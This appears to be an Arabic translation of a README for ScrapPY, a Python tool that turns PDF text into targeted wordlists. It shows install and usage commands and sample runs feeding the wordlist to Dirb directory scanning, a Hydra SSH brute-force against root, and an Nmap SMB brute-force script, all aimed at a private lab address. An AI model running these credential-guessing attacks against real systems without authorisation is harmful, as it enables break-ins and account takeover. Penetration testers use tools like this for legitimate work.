
أداة مساعدة بلغة بايثون تقوم باستخراج النصوص من ملفات PDF لإنشاء قوائم كلمات مستهدفة لهجمات القوة العمياء والتصفح القسري وهجمات القاموس، مع أوضاع تحليل تردد الكلمات والإنتروبيا والبيانات الوصفية.
ScrapPY هي أداة بايثون لاستخراج الكتيبات والمستندات وملفات PDF الحساسة الأخرى لإنشاء قوائم كلمات مستهدفة يمكن استخدامها بواسطة أدوات الأمان الهجومية لتنفيذ هجمات القوة الغاشمة والتصفح القسري وهجمات القاموس. تقوم ScrapPY بتحليل تردد الكلمات والإنتروبيا والبيانات الوصفية، ويمكن تشغيلها في أوضاع الإخراج الكامل لصياغة قوائم كلمات مخصصة للهجمات المستهدفة. تغوص الأداة في العمق لاكتشاف الكلمات والعبارات الرئيسية المؤدية إلى كلمات مرور محتملة أو أدلة مخفية، مع الإخراج إلى ملف نصي يمكن قراءته بواسطة أدوات مثل Hydra وDirb وNmap. سارع بالوصول الأولي واكتشاف الثغرات والحركة الجانبية مع ScrapPY!
تنزيل المستودع:
$ mkdir ScrapPY
$ cd ScrapPY/
$ sudo git clone https://github.com/RoseSecurity/ScrapPY.git
تثبيت التبعيات:
$ python3 -m venv venv
$ source .venv/bin/activate
$ pip3 install -r requirements.txt
usage: ScrapPY.py [-h] [-f FILE] [-m {word-frequency,full,metadata,entropy}] [-o OUTPUT]
إخراج البيانات الوصفية للمستند:
$ python3 ScrapPY.py -f example.pdf -m metadata
إخراج أكثر 100 كلمة مفتاحية استخداماً إلى ملف باسم Top_100_Keywords.txt:
$ python3 ScrapPY.py -f example.pdf -m word-frequency -o Top_100_Keywords.txt
إخراج جميع الكلمات المفتاحية إلى ملف ScrapPY.txt الافتراضي:
$ python3 ScrapPY.py -f example.pdf
إخراج أفضل 100 كلمة ذات أعلى تصنيف إنتروبيا:
$ python3 ScrapPY.py -f example.pdf -m entropy
$ head -50 ScrapPY.txt
$ wc -l ScrapPY.txt
قم بالتكامل بسهولة مع أدوات مثل Dirb لتسريع عملية اكتشاف الدلائل الفرعية المخفية:
root@RoseSecurity:~# dirb http://192.168.1.123/ /root/ScrapPY/ScrapPY.txt
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Fri May 16 13:41:45 2014
URL_BASE: http://192.168.1.123/
WORDLIST_FILES: /root/ScrapPY/ScrapPY.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.1.123/ ----
==> DIRECTORY: http://192.168.1.123/vi/
+ http://192.168.1.123/programming (CODE:200|SIZE:2726)
+ http://192.168.1.123/s7-logic/ (CODE:403|SIZE:1122)
==> DIRECTORY: http://192.168.1.123/config/
==> DIRECTORY: http://192.168.1.123/docs/
==> DIRECTORY: http://192.168.1.123/external/
استخدم ScrapPY مع Hydra للهجمات المتقدمة بالقوة الغاشمة:
root@RoseSecurity:~# hydra -l root -P /root/ScrapPY/ScrapPY.txt -t 6 ssh://192.168.1.123
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-19 07:53:33
[DATA] 6 tasks, 1 server, 1003 login tries (l:1/p:1003), ~167 tries per task
[DATA] attacking service ssh on port 22
عزز نصوص Nmap باستخدام قوائم كلمات ScrapPY:
nmap -p445 --script smb-brute.nse --script-args userdb=users.txt,passdb=ScrapPY.txt 192.168.1.123
homebrew